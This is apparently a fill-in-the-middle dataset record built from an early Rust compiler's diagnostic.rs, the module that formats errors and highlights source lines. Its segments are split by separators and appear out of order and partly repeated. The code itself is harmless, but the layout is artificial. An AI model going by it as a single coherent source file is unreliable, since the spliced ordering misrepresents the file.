GetConsoleMode(handle, &mut out) != 0
}
}
impl Write for Destination {
fn write(&mut self, bytes: &[u8]) -> io::Result<usize> {
match *self {
Terminal(ref mut t) => t.write(bytes),
Raw(ref mut w) => w.write(bytes),
}
}
fn flush(&mut self) -> io::Result<()> {
match *self {
Terminal(ref mut t) => t.flush(),
Raw(ref mut w) => w.flush(),
}
}
}
impl Emitter for EmitterWriter {
fn emit(&mut self,
cmsp: Option<(&codemap::CodeMap, Span)>,
msg: &str, code: Option<&str>, lvl: Level) {
let error = match cmsp {
Some((cm, COMMAND_LINE_SP)) => emit(self, cm,
FileLine(COMMAND_LINE_SP),
msg, code, lvl),
Some((cm, sp)) => emit(self, cm, FullSpan(sp), msg, code, lvl),
None => print_diagnostic(self, "", lvl, msg, code),
};
match error {
Ok(()) => {}
Err(e) => panic!("failed to print diagnostics: {:?}", e),
}
}
fn custom_emit(&mut self, cm: &codemap::CodeMap,
sp: RenderSpan, msg: &str, lvl: Level) {
match emit(self, cm, sp, msg, None, lvl) {
Ok(()) => {}
Err(e) => panic!("failed to print diagnostics: {:?}", e),
}
}
}
fn emit(dst: &mut EmitterWriter, cm: &codemap::CodeMap, rsp: RenderSpan,
msg: &str, code: Option<&str>, lvl: Level) -> io::Result<()> {
let sp = rsp.span();
// We cannot check equality directly with COMMAND_LINE_SP
// since PartialEq is manually implemented to ignore the ExpnId
let ss = if sp.expn_id == COMMAND_LINE_EXPN {
"<command line option>".to_string()
} else if let EndSpan(_) = rsp {
let span_end = Span { lo: sp.hi, hi: sp.hi, expn_id: sp.expn_id};
cm.span_to_string(span_end)
} else {
cm.span_to_string(sp)
};
try!(print_diagnostic(dst, &ss[..], lvl, msg, code));
match rsp {
FullSpan(_) => {
try!(highlight_lines(dst, cm, sp, lvl, cm.span_to_lines(sp)));
try!(print_macro_backtrace(dst, cm, sp));
}
EndSpan(_) => {
try!(end_highlight_lines(dst, cm, sp, lvl, cm.span_to_lines(sp)));
try!(print_macro_backtrace(dst, cm, sp));
}
Suggestion(_, ref suggestion) => {
try!(highlight_suggestion(dst, cm, sp, suggestion));
try!(print_macro_backtrace(dst, cm, sp));
}
FileLine(..) => {
// no source text in this case!
}
}
match code {
Some(code) =>
match dst.registry.as_ref().and_then(|registry| registry.find_description(code)) {
Some(_) => {
try!(print_diagnostic(dst, &ss[..], Help,
&format!("run `rustc --explain {}` to see a detailed \
explanation", code), None));
}
None => ()
},
None => (),
}
Ok(())
}
fn highlight_suggestion(err: &mut EmitterWriter,
cm: &codemap::CodeMap,
sp: Span,
suggestion: &str)
-> io::Result<()>
{
let lines = cm.span_to_lines(sp).unwrap();
assert!(!lines.lines.is_empty());
// To build up the result, we want to take the snippet from the first
// line that precedes the span, prepend that with the suggestion, and
// then append the snippet from the last line that trails the span.
let fm = &lines.file;
let first_line = &lines.lines[0];
let prefix = fm.get_line(first_line.line_index)
.map(|l| &l[..first_line.start_col.0])
.unwrap_or("");
let last_line = lines.lines.last().unwrap();
let suffix = fm.get_line(last_line.line_index)
.map(|l| &l[last_line.end_col.0..])
.unwrap_or("");
let complete = format!("{}{}{}", prefix, suggestion, suffix);
// print the suggestion without any line numbers, but leave
// space for them. This helps with lining up with previous
// snippets from the actual error being reported.
let fm = &*lines.file;
let mut lines = complete.lines();
for (line, line_index) in lines.by_ref().take(MAX_LINES).zip(first_line.line_index..) {
let elided_line_num = format!("{}", line_index+1);
try!(write!(&mut err.dst, "{0}:{1:2$} {3}\n",
fm.name, "", elided_line_num.len(), line));
}
// if we elided some lines, add an ellipsis
if lines.next().is_some() {
let elided_line_num = format!("{}", first_line.line_index + MAX_LINES + 1);
try!(write!(&mut err.dst, "{0:1$} {0:2$} ...\n",
"", fm.name.len(), elided_line_num.len())); |
fn highlight_lines(err: &mut EmitterWriter,
cm: &codemap::CodeMap,
sp: Span,
lvl: Level,
lines: codemap::FileLinesResult)
-> io::Result<()>
{
let lines = match lines {
Ok(lines) => lines,
Err(_) => {
try!(write!(&mut err.dst, "(internal compiler error: unprintable span)\n"));
return Ok(());
}
};
let fm = &*lines.file;
let line_strings: Option<Vec<&str>> =
lines.lines.iter()
.map(|info| fm.get_line(info.line_index))
.collect();
let line_strings = match line_strings {
None => { return Ok(()); }
Some(line_strings) => line_strings
};
// Display only the first MAX_LINES lines.
let all_lines = lines.lines.len();
let display_lines = cmp::min(all_lines, MAX_LINES);
let display_line_infos = &lines.lines[..display_lines];
let display_line_strings = &line_strings[..display_lines];
// Calculate the widest number to format evenly and fix #11715
assert!(display_line_infos.len() > 0);
let mut max_line_num = display_line_infos[display_line_infos.len() - 1].line_index + 1;
let mut digits = 0;
while max_line_num > 0 {
max_line_num /= 10;
digits += 1;
}
// Print the offending lines
for (line_info, line) in display_line_infos.iter().zip(display_line_strings) {
try!(write!(&mut err.dst, "{}:{:>width$} {}\n",
fm.name,
line_info.line_index + 1,
line,
width=digits));
}
// If we elided something, put an ellipsis.
if display_lines < all_lines {
let last_line_index = display_line_infos.last().unwrap().line_index;
let s = format!("{}:{} ", fm.name, last_line_index + 1);
try!(write!(&mut err.dst, "{0:1$}...\n", "", s.len()));
}
// FIXME (#3260)
// If there's one line at fault we can easily point to the problem
if lines.lines.len() == 1 {
let lo = cm.lookup_char_pos(sp.lo);
let mut digits = 0;
let mut num = (lines.lines[0].line_index + 1) / 10;
// how many digits must be indent past?
while num > 0 { num /= 10; digits += 1; }
let mut s = String::new();
// Skip is the number of characters we need to skip because they are
// part of the 'filename:line ' part of the previous line.
let skip = fm.name.chars().count() + digits + 3;
for _ in 0..skip {
s.push(' ');
}
if let Some(orig) = fm.get_line(lines.lines[0].line_index) {
let mut col = skip;
let mut lastc = ' ';
let mut iter = orig.chars().enumerate();
for (pos, ch) in iter.by_ref() {
lastc = ch;
if pos >= lo.col.to_usize() { break; }
// Whenever a tab occurs on the previous line, we insert one on
// the error-point-squiggly-line as well (instead of a space).
// That way the squiggly line will usually appear in the correct
// position.
match ch {
'\t' => {
col += 8 - col%8;
s.push('\t');
},
_ => {
col += 1;
s.push(' ');
},
}
}
try!(write!(&mut err.dst, "{}", s));
let mut s = String::from("^");
let count = match lastc {
// Most terminals have a tab stop every eight columns by default
'\t' => 8 - col%8,
_ => 1,
};
col += count;
s.extend(::std::iter::repeat('~').take(count));
let hi = cm.lookup_char_pos(sp.hi);
if hi.col != lo.col {
for (pos, ch) in iter {
if pos >= hi.col.to_usize() { break; }
let count = match ch {
'\t' => 8 - col%8,
_ => 1,
};
col += count;
s.extend(::std::iter::repeat('~').take(count));
}
}
if s.len() > 1 {
// One extra squiggly is replaced by a "^"
s.pop();
}
try!(print_maybe_styled(err,
&format!("{}\n", s),
term::attr::ForegroundColor(lvl.color())));
}
}
Ok(())
}
/// Here are the differences between this and the normal `highlight_lines`:
/// `end_highlight_lines` will always put arrow on the last byte of the
/// span (instead of the first byte). Also, when the span is too long (more
/// than 6 lines), `end_highlight_lines` will print the first line, then
/// dot dot dot, then last line, whereas `highlight_lines` prints the first
/// six lines.
#[allow(deprecated)]
fn end_highlight_lines(w: &mut EmitterWriter,
cm: &codemap::CodeMap,
sp: Span,
lvl: Level,
lines: codemap::FileLinesResult)
-> io::Result<()> {
let lines = match lines {
Ok(lines) => lines,
Err(_) => {
try!(write!(&mut w.dst, "(internal compiler error: unprintable span)\n"));
return Ok(());
}
};
let fm = &*lines.file;
let lines = &lines.lines[..];
if lines.len() > MAX_LINES {
if let Some(line) = fm.get_line(lines[0].line_index) {
try!(write!(&mut w.dst, "{}:{} {}\n", fm.name,
lines[0].line_index + 1, line));
}
try!(write!(&mut w.dst, "...\n"));
let last_line_index = lines[lines.len() - 1].line_index;
if let Some(last_line) = fm.get_line(last_line_index) {
try!(write!(&mut w.dst, "{}:{} {}\n", fm.name,
last_line_index + 1, last_line));
}
} else {
for line_info in lines {
if let Some(line) = fm.get_line(line_info.line_index) {
try!(write!(&mut w.dst, "{}:{} {}\n", fm.name,
line_info.line_index + 1, line));
}
}
}
let last_line_start = format!("{}:{} ", fm.name, lines[lines.len()-1].line_index + 1);
let hi = cm.lookup_char_pos(sp.hi);
let skip = last_line_start.chars().count();
let mut s = String::new();
for _ in 0..skip {
s.push(' ');
}
if let Some(orig) = fm.get_line(lines[0].line_index) {
let iter = orig.chars().enumerate();
for (pos, ch) in iter {
// Span seems to use half-opened interval, so subtract 1
if pos >= hi.col.to_usize() - 1 { break; }
// Whenever a tab occurs on the previous line, we insert one on
// the error-point-squiggly-line as well (instead of a space).
// That way the squiggly line will usually appear in the correct
// position.
match ch {
'\t' => s.push('\t'),
_ => s.push(' '),
}
}
}
s.push('^');
s.push('\n');
print_maybe_styled(w,
&s[..],
term::attr::ForegroundColor(lvl.color()))
}
fn print_macro_backtrace(w: &mut EmitterWriter,
cm: &codemap::CodeMap,
sp: Span)
-> io::Result<()> {
let cs = try!(cm.with_expn_info(sp.expn_id, |expn_info| -> io::Result<_> {
match expn_info {
Some(ei) => {
let ss = ei.callee.span.map_or(String::new(),
|span| cm.span_to_string(span));
let (pre, post) = match ei.callee.format {
codemap::MacroAttribute => ("#[", "]"),
codemap::MacroBang => ("", "!"),
codemap::CompilerExpansion => ("", ""),
};
try!(print_diagnostic(w, &ss, Note,
&format!("in expansion of {}{}{}",
pre,
ei.callee.name,
post),
None));
let ss = cm.span_to_string(ei.call_site);
try!(print_diagnostic(w, &ss, Note, "expansion site", None));
Ok(Some(ei.call_site))
}
None => Ok(None)
}
}));
cs.map_or(Ok(()), |call_site| print_macro_backtrace(w, cm, call_site))
}
pub fn expect<T, M>(diag: &SpanHandler, opt: Option<T>, msg: M) -> T where
M: FnOnce() -> String,
{
match opt {
Some(t) => t,
None => diag.handler().bug(&msg()),
}
}
#[cfg(test)]
mod test {
use super::{EmitterWriter, highlight_lines, Level};
use codemap::{mk_sp, CodeMap, BytePos};
use std::sync::{Arc, Mutex};
use std::io::{self, Write};
use std::str::from_utf8;
// Diagnostic doesn't align properly in span where line number increases by one digit
#[test]
fn test_hilight_suggestion_issue_11715() {
struct Sink(Arc<Mutex<Vec<u8>>>);
impl Write for Sink {
fn write(&mut self, data: &[u8]) -> io::Result<usize> {
Write::write(&mut *self.0.lock().unwrap(), data)
}
fn flush(&mut self) -> io::Result<()> { Ok(()) }
}
let data = Arc::new(Mutex::new(Vec::new()));
let mut ew = EmitterWriter::new(Box::new(Sink(data.clone())), None);
let cm = CodeMap::new();
let content = "abcdefg
koksi
line3
line4
cinq
line6
line7
line8
line9
line10
e-lä-vän
tolv
dreizehn
";
let file = cm.new_filemap("dummy.txt".to_string(), content.to_string());
for (i, b) in content.bytes().enumerate() {
if b == b'\n' {
file.next_line(BytePos(i as u32));
}
}
let start = file.lines.borrow()[7];
let end = file.lines.borrow()[11];
let sp = mk_sp(start, end);
let lvl = Level::Error;
println!("span_to_lines");
let lines = cm.span_to_lines(sp);
println!("highlight_lines");
highlight_lines(&mut ew, &cm, sp, lvl, lines).unwrap();
println!("done");
let vec = data.lock().unwrap().clone();
let vec: &[u8] = &vec;
println!("{}", from_utf8(vec).unwrap());
assert_eq!(vec, "dummy.txt: 8 \n\
dummy.txt: 9 \n\
dummy.txt:10 \n\
dummy.txt:11 \n\
dummy.txt:12 \n".as_bytes());
}
} | }
Ok(())
} | random_line_split |
diagnostic.rs | // Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
pub use self::Level::*;
pub use self::RenderSpan::*;
pub use self::ColorConfig::*;
use self::Destination::*;
use codemap::{self, COMMAND_LINE_SP, COMMAND_LINE_EXPN, Pos, Span};
use diagnostics;
use std::cell::{RefCell, Cell};
use std::{cmp, error, fmt};
use std::io::prelude::*;
use std::io;
use term::{self, WriterWrapper};
use libc;
/// maximum number of lines we will print for each error; arbitrary.
const MAX_LINES: usize = 6;
#[derive(Clone)]
pub enum RenderSpan {
/// A FullSpan renders with both with an initial line for the
/// message, prefixed by file:linenum, followed by a summary of
/// the source code covered by the span.
FullSpan(Span),
/// Similar to a FullSpan, but the cited position is the end of
/// the span, instead of the start. Used, at least, for telling
/// compiletest/runtest to look at the last line of the span
/// (since `end_highlight_lines` displays an arrow to the end
/// of the span).
EndSpan(Span),
/// A suggestion renders with both with an initial line for the
/// message, prefixed by file:linenum, followed by a summary
/// of hypothetical source code, where the `String` is spliced
/// into the lines in place of the code covered by the span.
Suggestion(Span, String),
/// A FileLine renders with just a line for the message prefixed
/// by file:linenum.
FileLine(Span),
}
impl RenderSpan {
fn span(&self) -> Span {
match *self {
FullSpan(s) |
Suggestion(s, _) |
EndSpan(s) |
FileLine(s) =>
s
}
}
}
#[derive(Clone, Copy)]
pub enum ColorConfig {
Auto,
Always,
Never
}
pub trait Emitter {
fn emit(&mut self, cmsp: Option<(&codemap::CodeMap, Span)>,
msg: &str, code: Option<&str>, lvl: Level);
fn custom_emit(&mut self, cm: &codemap::CodeMap,
sp: RenderSpan, msg: &str, lvl: Level);
}
/// Used as a return value to signify a fatal error occurred. (It is also
/// used as the argument to panic at the moment, but that will eventually
/// not be true.)
#[derive(Copy, Clone, Debug)]
#[must_use]
pub struct FatalError;
impl fmt::Display for FatalError {
fn fmt(&self, f: &mut fmt::Formatter) -> Result<(), fmt::Error> {
write!(f, "parser fatal error")
}
}
impl error::Error for FatalError {
fn description(&self) -> &str {
"The parser has encountered a fatal error"
}
}
/// Signifies that the compiler died with an explicit call to `.bug`
/// or `.span_bug` rather than a failed assertion, etc.
#[derive(Copy, Clone, Debug)]
pub struct ExplicitBug;
impl fmt::Display for ExplicitBug {
fn fmt(&self, f: &mut fmt::Formatter) -> Result<(), fmt::Error> {
write!(f, "parser internal bug")
}
}
impl error::Error for ExplicitBug {
fn description(&self) -> &str {
"The parser has encountered an internal bug"
}
}
/// A span-handler is like a handler but also
/// accepts span information for source-location
/// reporting.
pub struct SpanHandler {
pub handler: Handler,
pub cm: codemap::CodeMap,
}
impl SpanHandler {
pub fn new(handler: Handler, cm: codemap::CodeMap) -> SpanHandler {
SpanHandler {
handler: handler,
cm: cm,
}
}
pub fn span_fatal(&self, sp: Span, msg: &str) -> FatalError {
self.handler.emit(Some((&self.cm, sp)), msg, Fatal);
return FatalError;
}
pub fn span_fatal_with_code(&self, sp: Span, msg: &str, code: &str) -> FatalError {
self.handler.emit_with_code(Some((&self.cm, sp)), msg, code, Fatal);
return FatalError;
}
pub fn span_err(&self, sp: Span, msg: &str) {
self.handler.emit(Some((&self.cm, sp)), msg, Error);
self.handler.bump_err_count();
}
pub fn span_err_with_code(&self, sp: Span, msg: &str, code: &str) {
self.handler.emit_with_code(Some((&self.cm, sp)), msg, code, Error);
self.handler.bump_err_count();
}
pub fn span_warn(&self, sp: Span, msg: &str) {
self.handler.emit(Some((&self.cm, sp)), msg, Warning);
}
pub fn span_warn_with_code(&self, sp: Span, msg: &str, code: &str) {
self.handler.emit_with_code(Some((&self.cm, sp)), msg, code, Warning);
}
pub fn span_note(&self, sp: Span, msg: &str) {
self.handler.emit(Some((&self.cm, sp)), msg, Note);
}
pub fn span_end_note(&self, sp: Span, msg: &str) {
self.handler.custom_emit(&self.cm, EndSpan(sp), msg, Note);
}
pub fn span_help(&self, sp: Span, msg: &str) {
self.handler.emit(Some((&self.cm, sp)), msg, Help);
}
/// Prints out a message with a suggested edit of the code.
///
/// See `diagnostic::RenderSpan::Suggestion` for more information.
pub fn span_suggestion(&self, sp: Span, msg: &str, suggestion: String) {
self.handler.custom_emit(&self.cm, Suggestion(sp, suggestion), msg, Help);
}
pub fn fileline_note(&self, sp: Span, msg: &str) {
self.handler.custom_emit(&self.cm, FileLine(sp), msg, Note);
}
pub fn fileline_help(&self, sp: Span, msg: &str) {
self.handler.custom_emit(&self.cm, FileLine(sp), msg, Help);
}
pub fn span_bug(&self, sp: Span, msg: &str) -> ! {
self.handler.emit(Some((&self.cm, sp)), msg, Bug);
panic!(ExplicitBug);
}
pub fn span_unimpl(&self, sp: Span, msg: &str) -> ! {
self.span_bug(sp, &format!("unimplemented {}", msg));
}
pub fn handler<'a>(&'a self) -> &'a Handler {
&self.handler
}
}
/// A handler deals with errors; certain errors
/// (fatal, bug, unimpl) may cause immediate exit,
/// others log errors for later reporting.
pub struct Handler {
err_count: Cell<usize>,
emit: RefCell<Box<Emitter + Send>>,
pub can_emit_warnings: bool
}
impl Handler {
pub fn new(color_config: ColorConfig,
registry: Option<diagnostics::registry::Registry>,
can_emit_warnings: bool) -> Handler {
let emitter = Box::new(EmitterWriter::stderr(color_config, registry));
Handler::with_emitter(can_emit_warnings, emitter)
}
pub fn with_emitter(can_emit_warnings: bool, e: Box<Emitter + Send>) -> Handler {
Handler {
err_count: Cell::new(0),
emit: RefCell::new(e),
can_emit_warnings: can_emit_warnings
}
}
pub fn fatal(&self, msg: &str) -> ! {
self.emit.borrow_mut().emit(None, msg, None, Fatal);
panic!(FatalError);
}
pub fn err(&self, msg: &str) {
self.emit.borrow_mut().emit(None, msg, None, Error);
self.bump_err_count();
}
pub fn bump_err_count(&self) {
self.err_count.set(self.err_count.get() + 1);
}
pub fn err_count(&self) -> usize {
self.err_count.get()
}
pub fn has_errors(&self) -> bool {
self.err_count.get() > 0
}
pub fn abort_if_errors(&self) {
let s;
match self.err_count.get() {
0 => return,
1 => s = "aborting due to previous error".to_string(),
_ => {
s = format!("aborting due to {} previous errors",
self.err_count.get());
}
}
self.fatal(&s[..]);
}
pub fn warn(&self, msg: &str) {
self.emit.borrow_mut().emit(None, msg, None, Warning);
}
pub fn note(&self, msg: &str) {
self.emit.borrow_mut().emit(None, msg, None, Note);
}
pub fn help(&self, msg: &str) {
self.emit.borrow_mut().emit(None, msg, None, Help);
}
pub fn bug(&self, msg: &str) -> ! {
self.emit.borrow_mut().emit(None, msg, None, Bug);
panic!(ExplicitBug);
}
pub fn unimpl(&self, msg: &str) -> ! {
self.bug(&format!("unimplemented {}", msg));
}
pub fn emit(&self,
cmsp: Option<(&codemap::CodeMap, Span)>,
msg: &str,
lvl: Level) {
if lvl == Warning && !self.can_emit_warnings { return }
self.emit.borrow_mut().emit(cmsp, msg, None, lvl);
}
pub fn emit_with_code(&self,
cmsp: Option<(&codemap::CodeMap, Span)>,
msg: &str,
code: &str,
lvl: Level) {
if lvl == Warning && !self.can_emit_warnings { return }
self.emit.borrow_mut().emit(cmsp, msg, Some(code), lvl);
}
pub fn custom_emit(&self, cm: &codemap::CodeMap,
sp: RenderSpan, msg: &str, lvl: Level) {
if lvl == Warning && !self.can_emit_warnings { return }
self.emit.borrow_mut().custom_emit(cm, sp, msg, lvl);
}
}
#[derive(Copy, PartialEq, Clone, Debug)]
pub enum Level {
Bug,
Fatal,
Error,
Warning,
Note,
Help,
}
impl fmt::Display for Level {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
use std::fmt::Display;
match *self {
Bug => "error: internal compiler error".fmt(f),
Fatal | Error => "error".fmt(f),
Warning => "warning".fmt(f),
Note => "note".fmt(f),
Help => "help".fmt(f),
}
}
}
impl Level {
fn color(self) -> term::color::Color {
match self {
Bug | Fatal | Error => term::color::BRIGHT_RED,
Warning => term::color::BRIGHT_YELLOW,
Note => term::color::BRIGHT_GREEN,
Help => term::color::BRIGHT_CYAN,
}
}
}
fn print_maybe_styled(w: &mut EmitterWriter,
msg: &str,
color: term::attr::Attr) -> io::Result<()> {
match w.dst {
Terminal(ref mut t) => {
try!(t.attr(color));
// If `msg` ends in a newline, we need to reset the color before
// the newline. We're making the assumption that we end up writing
// to a `LineBufferedWriter`, which means that emitting the reset
// after the newline ends up buffering the reset until we print
// another line or exit. Buffering the reset is a problem if we're
// sharing the terminal with any other programs (e.g. other rustc
// instances via `make -jN`).
//
// Note that if `msg` contains any internal newlines, this will
// result in the `LineBufferedWriter` flushing twice instead of
// once, which still leaves the opportunity for interleaved output
// to be miscolored. We assume this is rare enough that we don't
// have to worry about it.
if msg.ends_with("\n") {
try!(t.write_all(msg[..msg.len()-1].as_bytes()));
try!(t.reset());
try!(t.write_all(b"\n"));
} else {
try!(t.write_all(msg.as_bytes()));
try!(t.reset());
}
Ok(())
}
Raw(ref mut w) => w.write_all(msg.as_bytes()),
}
}
fn print_diagnostic(dst: &mut EmitterWriter, topic: &str, lvl: Level,
msg: &str, code: Option<&str>) -> io::Result<()> {
if !topic.is_empty() {
try!(write!(&mut dst.dst, "{} ", topic));
}
try!(print_maybe_styled(dst,
&format!("{}: ", lvl.to_string()),
term::attr::ForegroundColor(lvl.color())));
try!(print_maybe_styled(dst,
&format!("{}", msg),
term::attr::Bold));
match code {
Some(code) => {
let style = term::attr::ForegroundColor(term::color::BRIGHT_MAGENTA);
try!(print_maybe_styled(dst, &format!(" [{}]", code.clone()), style));
}
None => ()
}
try!(write!(&mut dst.dst, "\n"));
Ok(())
}
pub struct EmitterWriter {
dst: Destination,
registry: Option<diagnostics::registry::Registry>
}
enum Destination {
Terminal(Box<term::Terminal<WriterWrapper> + Send>),
Raw(Box<Write + Send>),
}
impl EmitterWriter {
pub fn stderr(color_config: ColorConfig,
registry: Option<diagnostics::registry::Registry>) -> EmitterWriter {
let stderr = io::stderr();
let use_color = match color_config {
Always => true,
Never => false,
Auto => stderr_isatty(),
};
if use_color {
let dst = match term::stderr() {
Some(t) => Terminal(t),
None => Raw(Box::new(stderr)),
};
EmitterWriter { dst: dst, registry: registry }
} else {
EmitterWriter { dst: Raw(Box::new(stderr)), registry: registry }
}
}
pub fn new(dst: Box<Write + Send>,
registry: Option<diagnostics::registry::Registry>) -> EmitterWriter {
EmitterWriter { dst: Raw(dst), registry: registry }
}
}
#[cfg(unix)]
fn stderr_isatty() -> bool {
unsafe { libc::isatty(libc::STDERR_FILENO) != 0 }
}
#[cfg(windows)]
fn stderr_isatty() -> bool {
const STD_ERROR_HANDLE: libc::DWORD = -12i32 as libc::DWORD;
extern "system" {
fn GetStdHandle(which: libc::DWORD) -> libc::HANDLE;
fn GetConsoleMode(hConsoleHandle: libc::HANDLE,
lpMode: libc::LPDWORD) -> libc::BOOL;
}
unsafe {
let handle = GetStdHandle(STD_ERROR_HANDLE);
let mut out = 0;
GetConsoleMode(handle, &mut out) != 0
}
}
impl Write for Destination {
fn write(&mut self, bytes: &[u8]) -> io::Result<usize> {
match *self {
Terminal(ref mut t) => t.write(bytes),
Raw(ref mut w) => w.write(bytes),
}
}
fn flush(&mut self) -> io::Result<()> {
match *self {
Terminal(ref mut t) => t.flush(),
Raw(ref mut w) => w.flush(),
}
}
}
impl Emitter for EmitterWriter {
fn emit(&mut self,
cmsp: Option<(&codemap::CodeMap, Span)>,
msg: &str, code: Option<&str>, lvl: Level) {
let error = match cmsp {
Some((cm, COMMAND_LINE_SP)) => emit(self, cm,
FileLine(COMMAND_LINE_SP),
msg, code, lvl),
Some((cm, sp)) => emit(self, cm, FullSpan(sp), msg, code, lvl),
None => print_diagnostic(self, "", lvl, msg, code),
};
match error {
Ok(()) => {}
Err(e) => panic!("failed to print diagnostics: {:?}", e),
}
}
fn custom_emit(&mut self, cm: &codemap::CodeMap,
sp: RenderSpan, msg: &str, lvl: Level) {
match emit(self, cm, sp, msg, None, lvl) {
Ok(()) => {}
Err(e) => panic!("failed to print diagnostics: {:?}", e),
}
}
}
fn emit(dst: &mut EmitterWriter, cm: &codemap::CodeMap, rsp: RenderSpan,
msg: &str, code: Option<&str>, lvl: Level) -> io::Result<()> {
let sp = rsp.span();
// We cannot check equality directly with COMMAND_LINE_SP
// since PartialEq is manually implemented to ignore the ExpnId
let ss = if sp.expn_id == COMMAND_LINE_EXPN {
"<command line option>".to_string()
} else if let EndSpan(_) = rsp {
let span_end = Span { lo: sp.hi, hi: sp.hi, expn_id: sp.expn_id};
cm.span_to_string(span_end)
} else {
cm.span_to_string(sp)
};
try!(print_diagnostic(dst, &ss[..], lvl, msg, code));
match rsp {
FullSpan(_) => {
try!(highlight_lines(dst, cm, sp, lvl, cm.span_to_lines(sp)));
try!(print_macro_backtrace(dst, cm, sp));
}
EndSpan(_) => {
try!(end_highlight_lines(dst, cm, sp, lvl, cm.span_to_lines(sp)));
try!(print_macro_backtrace(dst, cm, sp));
}
Suggestion(_, ref suggestion) => {
try!(highlight_suggestion(dst, cm, sp, suggestion));
try!(print_macro_backtrace(dst, cm, sp));
}
FileLine(..) => {
// no source text in this case!
}
}
match code {
Some(code) =>
match dst.registry.as_ref().and_then(|registry| registry.find_description(code)) {
Some(_) => {
try!(print_diagnostic(dst, &ss[..], Help,
&format!("run `rustc --explain {}` to see a detailed \
explanation", code), None));
}
None => ()
},
None => (),
}
Ok(())
}
fn highlight_suggestion(err: &mut EmitterWriter,
cm: &codemap::CodeMap,
sp: Span,
suggestion: &str)
-> io::Result<()>
{
let lines = cm.span_to_lines(sp).unwrap();
assert!(!lines.lines.is_empty());
// To build up the result, we want to take the snippet from the first
// line that precedes the span, prepend that with the suggestion, and
// then append the snippet from the last line that trails the span.
let fm = &lines.file;
let first_line = &lines.lines[0];
let prefix = fm.get_line(first_line.line_index)
.map(|l| &l[..first_line.start_col.0])
.unwrap_or("");
let last_line = lines.lines.last().unwrap();
let suffix = fm.get_line(last_line.line_index)
.map(|l| &l[last_line.end_col.0..])
.unwrap_or("");
let complete = format!("{}{}{}", prefix, suggestion, suffix);
// print the suggestion without any line numbers, but leave
// space for them. This helps with lining up with previous
// snippets from the actual error being reported.
let fm = &*lines.file;
let mut lines = complete.lines();
for (line, line_index) in lines.by_ref().take(MAX_LINES).zip(first_line.line_index..) {
let elided_line_num = format!("{}", line_index+1);
try!(write!(&mut err.dst, "{0}:{1:2$} {3}\n",
fm.name, "", elided_line_num.len(), line));
}
// if we elided some lines, add an ellipsis
if lines.next().is_some() {
let elided_line_num = format!("{}", first_line.line_index + MAX_LINES + 1);
try!(write!(&mut err.dst, "{0:1$} {0:2$} ...\n",
"", fm.name.len(), elided_line_num.len()));
}
Ok(())
}
fn highlight_lines(err: &mut EmitterWriter,
cm: &codemap::CodeMap,
sp: Span,
lvl: Level,
lines: codemap::FileLinesResult)
-> io::Result<()>
{
let lines = match lines {
Ok(lines) => lines,
Err(_) => {
try!(write!(&mut err.dst, "(internal compiler error: unprintable span)\n"));
return Ok(());
}
};
let fm = &*lines.file;
let line_strings: Option<Vec<&str>> =
lines.lines.iter()
.map(|info| fm.get_line(info.line_index))
.collect();
let line_strings = match line_strings {
None => { return Ok(()); }
Some(line_strings) => line_strings
};
// Display only the first MAX_LINES lines.
let all_lines = lines.lines.len();
let display_lines = cmp::min(all_lines, MAX_LINES);
let display_line_infos = &lines.lines[..display_lines];
let display_line_strings = &line_strings[..display_lines];
// Calculate the widest number to format evenly and fix #11715
assert!(display_line_infos.len() > 0);
let mut max_line_num = display_line_infos[display_line_infos.len() - 1].line_index + 1;
let mut digits = 0;
while max_line_num > 0 {
max_line_num /= 10;
digits += 1;
}
// Print the offending lines
for (line_info, line) in display_line_infos.iter().zip(display_line_strings) {
try!(write!(&mut err.dst, "{}:{:>width$} {}\n",
fm.name,
line_info.line_index + 1,
line,
width=digits));
}
// If we elided something, put an ellipsis.
if display_lines < all_lines {
let last_line_index = display_line_infos.last().unwrap().line_index;
let s = format!("{}:{} ", fm.name, last_line_index + 1);
try!(write!(&mut err.dst, "{0:1$}...\n", "", s.len()));
}
// FIXME (#3260)
// If there's one line at fault we can easily point to the problem
if lines.lines.len() == 1 {
let lo = cm.lookup_char_pos(sp.lo);
let mut digits = 0;
let mut num = (lines.lines[0].line_index + 1) / 10;
// how many digits must be indent past?
while num > 0 { num /= 10; digits += 1; }
let mut s = String::new();
// Skip is the number of characters we need to skip because they are
// part of the 'filename:line ' part of the previous line.
let skip = fm.name.chars().count() + digits + 3;
for _ in 0..skip {
s.push(' ');
}
if let Some(orig) = fm.get_line(lines.lines[0].line_index) {
let mut col = skip;
let mut lastc = ' ';
let mut iter = orig.chars().enumerate();
for (pos, ch) in iter.by_ref() {
lastc = ch;
if pos >= lo.col.to_usize() { break; }
// Whenever a tab occurs on the previous line, we insert one on
// the error-point-squiggly-line as well (instead of a space).
// That way the squiggly line will usually appear in the correct
// position.
match ch {
'\t' => {
col += 8 - col%8;
s.push('\t');
},
_ => {
col += 1;
s.push(' ');
},
}
}
try!(write!(&mut err.dst, "{}", s));
let mut s = String::from("^");
let count = match lastc {
// Most terminals have a tab stop every eight columns by default
'\t' => 8 - col%8,
_ => 1,
};
col += count;
s.extend(::std::iter::repeat('~').take(count));
let hi = cm.lookup_char_pos(sp.hi);
if hi.col != lo.col {
for (pos, ch) in iter {
if pos >= hi.col.to_usize() { break; }
let count = match ch {
'\t' => 8 - col%8,
_ => 1,
};
col += count;
s.extend(::std::iter::repeat('~').take(count));
}
}
if s.len() > 1 {
// One extra squiggly is replaced by a "^"
s.pop();
}
try!(print_maybe_styled(err,
&format!("{}\n", s),
term::attr::ForegroundColor(lvl.color())));
}
}
Ok(())
}
/// Here are the differences between this and the normal `highlight_lines`:
/// `end_highlight_lines` will always put arrow on the last byte of the
/// span (instead of the first byte). Also, when the span is too long (more
/// than 6 lines), `end_highlight_lines` will print the first line, then
/// dot dot dot, then last line, whereas `highlight_lines` prints the first
/// six lines.
#[allow(deprecated)]
fn end_highlight_lines(w: &mut EmitterWriter,
cm: &codemap::CodeMap,
sp: Span,
lvl: Level,
lines: codemap::FileLinesResult)
-> io::Result<()> {
let lines = match lines {
Ok(lines) => lines,
Err(_) => {
try!(write!(&mut w.dst, "(internal compiler error: unprintable span)\n"));
return Ok(());
}
};
